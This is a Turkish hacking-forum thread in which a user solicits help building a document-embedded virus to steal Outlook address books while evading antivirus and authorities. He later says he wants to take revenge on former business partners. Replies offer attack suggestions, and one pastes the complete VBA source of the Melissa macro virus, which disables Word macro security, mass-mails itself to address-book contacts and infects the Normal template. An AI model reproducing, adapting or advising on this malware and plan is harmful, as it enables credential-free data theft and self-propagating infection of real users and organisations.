Outlook Virüsü - Fikir Ve Yardım
-
Müridler,
Aklıma şöyle bir fikir geldi ve ufak bir araştırma sonucunda yapılabileceği fikrine vardım. Konu hakkında yorumlarınız ve yapabilecek mürid var mıdır?Ufak bir virüscük yapıyoruz ve pdf, jpg yada word dosyasına gömüyoruz. Kurban dosyayı açınca virüsümüz aktive oluyor ve;
1- Kişinin Outlook adres defterinde ki tüm kişilerin adı ve mail bilgilerini kopyalayıp, istediğimiz bir adrese mail atıyor,
2- 1 numara çok zor olur dersek, outlook adres defterinde ki herkese konusu Test olan bir mesaj atıyor ve bcc'ye bizim belirleyeceğimiz başka bir adresi koyuyor. Sonuç olarak gene tüm adres defterini ele geçirmiş oluyoruz.
Sizce antilere yakalanmadan böyle birşey yapılabilir mi? Yada yapabilecek bir mürid var mı?
Not: Konu gizli, zira BTK vs peşimize takılabilir.
-
outlook yapmayin amk bütün firmalarla uğraştırcaksınız beni :\
-
Yapılır niye yapılmasın .
Hatta zamanında Iloveyou wormu dediklerinin aynısını yapıyordu
Sana fikir oluşturması açısından şunu inceleyebilirsin ;
http://www.tahribat.com/Dokuman-I-Love-You-Virusunun-Ayrintili-Analizi-40/
-
Konu istediği kadar gizli olsun, böyle birsşey yapılırsa ilk şikayeti ben yaparım..
Outlook kullanıcılarından ne istiyorsunuz..
Gidin face mace ile uğraşın..
-
HoLyCat bunu yazdı
Konu istediği kadar gizli olsun, böyle birsşey yapılırsa ilk şikayeti ben yaparım..
Outlook kullanıcılarından ne istiyorsunuz..
Gidin face mace ile uğraşın..
diyanet.gov.tr mi burası aq hack sitesindeyiz aga
-
alicem bunu yazdıHoLyCat bunu yazdı
Konu istediği kadar gizli olsun, böyle birsşey yapılırsa ilk şikayeti ben yaparım..
Outlook kullanıcılarından ne istiyorsunuz..
Gidin face mace ile uğraşın..
diyanet.gov.tr mi burası aq hack sitesindeyiz aga
imana geldim amk..
-
Ufak bir virüscük yapıyoruz ve pdf, jpg yada word dosyasına gömüyoruz.
şu kısım hariç gayet yapılabilir bir mevzu. bu kısmı yapabilmen için öncelikle word ve pdf leri hangi yazılımlarla görüntülediklerini bulman daha sonra o yazılımlar için exploit bulman gerekir. güncel public bişi zaten bulamazsın. bu soruyu soran kişide kendisi bunu bulamaz.
en fazla binder aracılıgıyla exene bunlardan birini bindlayabilirsin.
-
PCdeki genelde antiler outlook maillerini açmadan tarar
yani gmail le mynet le göndersen yeme olasılığı daha fazla
-
La şöyle işle uğraşmayın bizim firmaya bulaşırsa 10bin hesap binküsür mail grubu var sonunda olan bize olacak :d
-
Melissa Virüsü vardı bir dönem makrolarla çalışıyordu yanlış hatırlamıyorsam. E-posta sunucularını hedef alıyordu. Ona benzer bir şey yapılabilir gibi.
Kaynak kodu da böyleymiş:
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub -
İlgilenen arkadaşlara çok teşekkür ederim. Bende araştırıp, kurcalamaya devam ediyorum. Bu arada yayılan virüs tarzında birşey düşünmüyorum, dolayısıyla outlook kullanan arkadaşlar rahat olsun. Durumu şöyle izah edeyim; bizim sektörde (ki sektörün bu dalında yeniyim), iş yapabilmem için kontaklara ihtiyacım var. Bu konuda bana yardım etme sözü veren ve şirket kurdurtan birkaç arkadaşım (sana şu şu şu kontakları veririz diyen), beni pis bir şekilde dolandırdı (kandırma demiyorum, resmen dolandırıldım).
Bu durumda bilgisayardan anlayan ve TBT müridi olan birisi olarak, bana yapacak tek şey bıraktılar. Arkadaşların kontak kişilerini çalmak. Elde edeceğim bilgiler belki zaten bende olanlardır ancak bu şekilde USD 15,000 dolandırılmanın acısını çıkartabilirim.